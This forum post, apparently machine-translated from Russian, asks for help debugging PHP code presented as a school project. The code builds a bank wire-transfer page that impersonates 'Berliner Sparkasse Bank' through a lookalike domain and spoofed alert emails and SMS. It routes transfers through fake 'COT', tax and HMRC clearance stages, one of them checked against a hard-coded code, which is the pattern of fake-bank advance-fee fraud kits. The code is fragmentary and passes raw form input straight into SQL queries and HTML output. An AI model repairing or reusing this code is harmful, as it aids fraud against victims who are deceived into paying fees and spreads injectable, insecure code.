Я разработал форму для отправки в базу данных. но при отправке форма возвращается пустой и перезагрузите форму. Я буду рад, если вы, ребята, сможете помочь с моей проектной работой.
Я новичок php. Я пытаюсь работать над школьным проектом. Когда форма html будет запрашивать форму php
Я загрузил файлы, а затем попробовал форму. Я продолжаю видеть возвращенную пустую страницу без перехода на следующую страницу, но возвращает пустое значение
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<td width="50%" valign="top">
<?php if ($curr_user['balance2'] != 0) { ?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<td class="head"><img src="images/i_qt_text.png" width="220" height="27" /></td>
<td style="border:#000080 1px solid; padding:5px;"><form id="form1" name="form1" method="post" action="" autocomplete="off">
<table width="100%" border="0" cellspacing="1">
<?php if($error_msg != "") { ?>
<td colspan="2" class="error_msg"><?php echo $error_msg; ?></td></tr>
<?php }?>
<td width="40%" nowrap="nowrap"><strong>Bank Name</strong></td>
<td width="60%" style="padding-left:1em;"><input name="bname" type="text" id="bname" value="<?php echo $_POST['bname']; ?>" /></td>
<td width="40%" nowrap="nowrap"><strong>Bank Address</strong></td>
<td width="60%" style="padding-left:1em;"><input name="bcountry" type="text" id="bcountry" value="<?php echo $_POST['bcountry']; ?>" /></td>
<td nowrap="nowrap"><strong>Account Number</strong></td>
<td style="padding-left:1em;"><input name="accnum" type="text" id="accnum" value="<?php echo $_POST['accnum']; ?>" /></td>
<!-- New addition -->
<td nowrap="nowrap"><strong>Account Name </strong> </td>
<td style="padding-left:1em;"><input name="accname" type="text" id="accname" value="<?php echo $_POST['accname']; ?>" /></td>
<td nowrap="nowrap"><strong>Owner's Address </strong> </td>
<td style="padding-left:1em;"><input name="ownadd" type="text" id="ownadd" value="<?php echo $_POST['ownadd']; ?>" /></td>
<td nowrap="nowrap"><strong>Routing Number </strong> </td>
<td style="padding-left:1em;"><input name="routnum" type="text" id="routnum" value="<?php echo $_POST['routnum']; ?>" /></td>
<!-- End, New addition -->
<td nowrap="nowrap"><strong>Swift Code </strong> </td>
<td style="padding-left:1em;"><input name="sort" type="text" id="sort" value="<?php echo $_POST['sort']; ?>" /></td>
<td nowrap="nowrap"><strong>Amount</strong> </td>
<td style="padding-left:1em;"><input name="amount" type="text" id="amount" value="<?php echo $_POST['amount']; ?>" /></td>
<td> </td>
<td style="padding-left:1em;"><input name="submit" type="submit" class="submit" id="submit" value="Continue >>" /></td>
<?php } else { ?>
<table width="100%" border="0">
<td class="error_msg">Your current available balance is £0. For more information on account funding, please call <strong><?php echo $phone1; ?></strong>, dial <?php echo $phone2; ?> when calling from abroad or email <a href="mailto:info@<?php echo $email_domain; ?>"><strong>info@<?php echo $email_domain; ?></strong></a></td>
<?php } ?>
<td width="50%" valign="top" style="padding-left:20px;"><table width="100%" border="0" cellpadding="0" cellspacing="0">
<td class="head">Important Information </td>
<td bgcolor="#E8FFF8" style="border:#000080 1px solid; padding:5px;">- Please be sure to verify the recieving account details before you proceed with the fund transfer. <br />
- The minimum amount transferable is £1,000 and the maximum is your available balance (£<?php echo number_format($curr_user['balance2'],2); ?>). <br />
- Transfer requests normally takes about 5 minutes to process and about 6-72 hours before fund reaches its destination. </td>
if(isset($_POST['submit'])) {
if(strlen($bname) == 0) {
$error_msg.="<li>Please enter receiving bank's name";
if(strlen($bcountry) == 0) {
$error_msg.="<li>Please enter receiving bank's country";
if(strlen($accnum) == 0) {
$error_msg.="<li>Please enter receiving account number</li>";
if(strlen($accname) == 0) {
$error_msg.="<li>Please enter receiving account name</li>";
if(strlen($sort) == 0) {
$error_msg.="<li>Please enter sort code</li>";
if(strlen($amount) == 0) {
$error_msg.="<li>Please enter amount to be transferred</li>";
elseif(!is_numeric($amount)) {
$error_msg.="<li>Amount must be digits only. No symbols allowed.</li>";
elseif($amount < 1000) {
$error_msg.="<li>Minimum transferable amount is £1,000</li>";
elseif($amount > $curr_user['balance2']) {
$error_msg.="<li>Maximum transferable amount is £".number_format($curr_user['balance2'],2)."</li>";
if($error_msg != "") {
$error_msg="<b>Please correct the following errors:</b>".$error_msg;
elseif($curr_user['status'] != "Active") {
$error_msg="Sorry, your account is restricted from performing this operation";
else {
mysql_query("INSERT INTO `history` (`id` ,`tid` ,`number` ,`date` ,`bname` ,`bcountry` ,`accnum` ,`accname` ,`ownadd` ,`routnum` ,`sort` ,`amount` ,`type` ,`details` ,`status`, `stat`)VALUES (NULL , '$tid', '$accid', NOW( ) , '$bname', '$bcountry', '$accnum', '$accname', '$ownadd', '$routnum', '$sort', '$amount', 'Fund Transfer', 'Wire Transfer to $accname, $bname, $bcountry(account number $accnum)', 'Pending Authorization', 'Unverified')");
if(isset($_GET['sid'])) {
$trans=mysql_fetch_array(mysql_query("SELECT * FROM history WHERE tid='$tid' LIMIT 1"));
if(isset($_GET['sid']) && $trans['stat'] == "Unverified") {
if(isset($_POST['pin_submit'])) {
if(strlen($pin) == 0) {
$error_msg="Please enter your account PIN to continue";
elseif(strlen($pin) < 5) {
$error_msg="Account PIN must be five digits";
elseif(!is_numeric($pin)) {
$error_msg="Account PIN must be digits only";
elseif(strcmp($pin,$curr_user['pin']) != 0) {
$error_msg="Invalid account PIN. If you feel this is an error, please call <b>$phone1</b>";
else {
mysql_query("UPDATE history SET stat='Unconfirmed' WHERE tid='$tid' LIMIT 1");
if(isset($_GET['sid']) && $trans['stat'] == "Unconfirmed") {
if(isset($_POST['proceed'])) {
mysql_query("UPDATE history SET stat='Progress_COT' WHERE tid='$tid' LIMIT 1");
if(isset($_GET['sid']) && ($trans['stat'] == "Progress_COT" || $trans['stat'] == "Progress_TAX" || $trans['stat'] == "Progress_FSA" || $trans['stat'] == "Progress_209")) {
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_COT" && isset($_GET['done'])) || $trans['stat'] == "COT_Page")) {
mysql_query("UPDATE history SET stat='COT_Page', status='Interrupted for COT Verification' WHERE tid='$tid' LIMIT 1");
if(isset($_POST['cot'])) {
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_TAX" && isset($_GET['done'])) || $trans['stat'] == "TAX_Page")) {
if($curr_user['tax_status'] != 1) {
mysql_query("UPDATE history SET stat='TAX_Page', status='Interrupted for Tax Clearance' WHERE tid='$tid' LIMIT 1");
else {
mysql_query("UPDATE history SET stat='Progress_FSA' WHERE tid='$tid' LIMIT 1");
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_FSA" && isset($_GET['done'])) || $trans['stat'] == "FSA_Page")) {
mysql_query("UPDATE history SET stat='FSA_Page', status='Interrupted for HMRC Clearance' WHERE tid='$tid' LIMIT 1");
if(isset($_POST['fsa'])) {
if(strlen($fsa) == 0) {
$error_msg="Please enter HMRC code to proceed with transfer";
elseif(!is_numeric($fsa)) {
$error_msg="HMRC code must be digits only";
elseif($fsa != "4493231") {
$error_msg="HMRC code is invalid. If you feel this is an error, please call <b>$phone1</b>";
else {
mysql_query("UPDATE history SET stat='Progress_209' WHERE tid='$tid' LIMIT 1");
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_209" && isset($_GET['done'])) || $trans['stat'] == "Done")) {
mysql_query("UPDATE history SET stat='Done', status='Successful' WHERE tid='$tid' LIMIT 1");
$bal=$curr_user['balance'] - $trans['amount'];
$bal2=$curr_user['balance2'] - $trans['amount'];
mysql_query("UPDATE users SET balance='$bal', balance2='$bal2' WHERE number='$accid' LIMIT 1");
$user=mysql_fetch_array(mysql_query("SELECT * FROM users WHERE number='$accid' LIMIT 1"));
$accountbalance= "$bal";
$availablebal= "$bal2";
$time = date("h:i:sa");
$date = date('d/m/Y');
$senderName = "Berliner Sparkasse Bank";
$fromEmailAddress = "no-reply-accountdept@b-sparkassede.com";
$emailSubject = "Funds Transfer Alert";
$comments = "\n Hello $first_name $last_name \n \n A funds transfer has just occurred in your e-Banking online account. If this transfer wasn't carried out by you, please report immediately to info@b-sparkassede.com or call 0 460 245 694 from within Germany and +32 460 245 694 from outside Germany. \n\n TRANSFER DETAILS \n \n BANK NAME: $bankname \n ACCOUNT NAME | NUMBER: $receiveraccname | $receiveraccnum \n BANK ADDRESS: $bankcountry \n BANK SORT CODE: $banksort \n \n AMOUNT: $sendingamount \n NEW BALANCE: $accountbalance \n AVAILABLE BALANCE: $availablebal \n \n TRANSFER DATE: $date \n TRANSFER TIME: $time \n \n \n \n Account Support Team \n For Berliner Sparkasse Bank.";
$mobilesender = "Acc Notify";
$message = "e-Banking ACCOUNT DEBIT
Acct: ***".substr($curr_user['number'],-6,6)."
Amount: $sendingamount
TO: $bankname | $receiveraccnum
Remarks: Wire Transfer
Bal: $availablebal
Date: $date | $time";
mail($recipient, $emailSubject, $comments, "From: $senderName <$fromEmailAddress>\r\nContent-Type: text/plain; charset=UTF-8\r\nContent-Transfer-Encoding: 8bit");
$url = "http://ediarosms.com/sms/api_v1?sub_account=$loginuser&sub_account_pass=$loginpass&action=send_sms&sender_id=".urlencode($mobilesender)."&message=".urlencode($message)."&recipients=".urlencode($mob_tel)."";